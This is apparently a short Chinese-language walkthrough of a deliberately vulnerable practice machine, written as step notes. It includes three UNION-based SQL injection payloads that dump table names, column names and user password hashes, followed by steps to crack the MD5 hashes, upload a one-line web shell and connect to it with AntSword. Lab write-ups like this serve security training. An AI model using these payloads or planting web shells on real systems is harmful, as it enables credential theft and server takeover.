1.靶机导入,扫描端口
扫描目录
注册,进入页面,点击search
判断sql注入
判断字段数
找数据库名
查看数据库中所有的表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
查表中列名
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
查看表中的数据
-1' union select group_concat(user),group_concat(pasword),3 from users#
md5解码,解码后结果
尝试登录
找到文件上传页面
上传一句话木马
访问,上传成功
蚁剑连接